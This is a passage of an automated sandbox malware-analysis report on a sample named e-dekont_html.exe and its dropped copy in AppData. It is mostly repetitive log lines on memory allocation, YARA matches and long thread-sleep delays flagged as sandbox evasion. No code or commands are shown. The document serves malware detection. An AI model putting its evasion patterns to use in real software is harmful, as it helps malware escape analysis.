                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: e-dekont_html.exe PID: 7624, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 2064, type: MEMORYSTR
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: A40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: 2770000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: 25F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: 87B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: 97B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: 99B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: A9B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: B000000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: C000000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: D000000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: 1610000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: 3230000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: 3060000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeMemory allocated: BA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeMemory allocated: 2760000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeMemory allocated: CD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeMemory allocated: 81F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeMemory allocated: 91F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeMemory allocated: 93D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeMemory allocated: A3D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeMemory allocated: AE40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeMemory allocated: BE40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeMemory allocated: CE40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeMemory allocated: EB0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeMemory allocated: 2980000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeMemory allocated: 26D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599641Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599531Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599422Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599311Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599203Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598985Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598860Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598639Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598516Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598407Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598282Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598157Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598032Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597922Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597813Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597688Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597563Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597438Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597297Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597188Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597063Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596938Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596813Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596688Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596578Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596465Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596324Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596094Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595891Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595780Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595672Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595562Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595454Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595329Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595204Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595079Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594954Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594829Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594704Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594579Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594454Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594329Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594204Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594079Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 593954Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 593829Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 593704Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 593579Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 593454Jump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 599422
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 599313
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 599188
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 599078
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 598969
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 598844
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 598735
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 598610
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 598485
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 598360
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 598235
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 598110
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 597985
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 597860
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 597735
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 597610
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 597485
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 597360
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 597235
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 597110
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 596985
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 596858
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 596750
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 596641
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 596531
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 596422
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 596313
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 596188
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 596079
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 595954
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 595829
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 595704
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 595579
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 595454
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 595329
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 595204
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 595079
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 594709
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 594580
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 594454
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 594329
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 594204
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 594079
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 593954
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 593829
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 593704
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 593579
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 593339
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 593219
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8083Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1052Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6516Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1183Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeWindow / User API: threadDelayed 3996Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeWindow / User API: threadDelayed 5804Jump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeWindow / User API: threadDelayed 2932
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeWindow / User API: threadDelayed 6891
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7648Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8020Thread sleep count: 8083 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1836Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8020Thread sleep count: 1052 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8136Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2460Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep count: 32 > 30Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep count: 3996 > 30Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -599875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516Thread sleep count: 5804 > 30Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -599766s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -599641s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -599531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -599422s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -599311s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -599203s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -599094s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -598985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -598860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -598639s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -598516s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -598407s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -598282s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -598157s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -598032s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -597922s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -597813s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -597688s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -597563s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -597438s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -597297s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -597188s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -597063s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -596938s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -596813s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -596688s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -596578s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -596465s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -596324s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -596094s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -595891s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -595780s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -595672s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -595562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -595454s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -595329s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -595204s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -595079s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -594954s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -594829s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -594704s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -594579s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -594454s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -594329s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -594204s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -594079s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -593954s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -593829s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -593704s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -593579s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132Thread sleep time: -593454s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7388Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep count: 33 > 30
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -30437127721620741s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 8116Thread sleep count: 2932 > 30
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -599422s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -599313s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep count: 31 > 30
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -599188s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 8116Thread sleep count: 6891 > 30
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -599078s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -598969s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -598844s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -598735s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -598610s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -598485s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -598360s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -598235s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -598110s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -597985s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -597860s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -597735s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -597610s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -597485s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -597360s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -597235s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -597110s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -596985s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -596858s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -596750s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -596641s >= -30000s
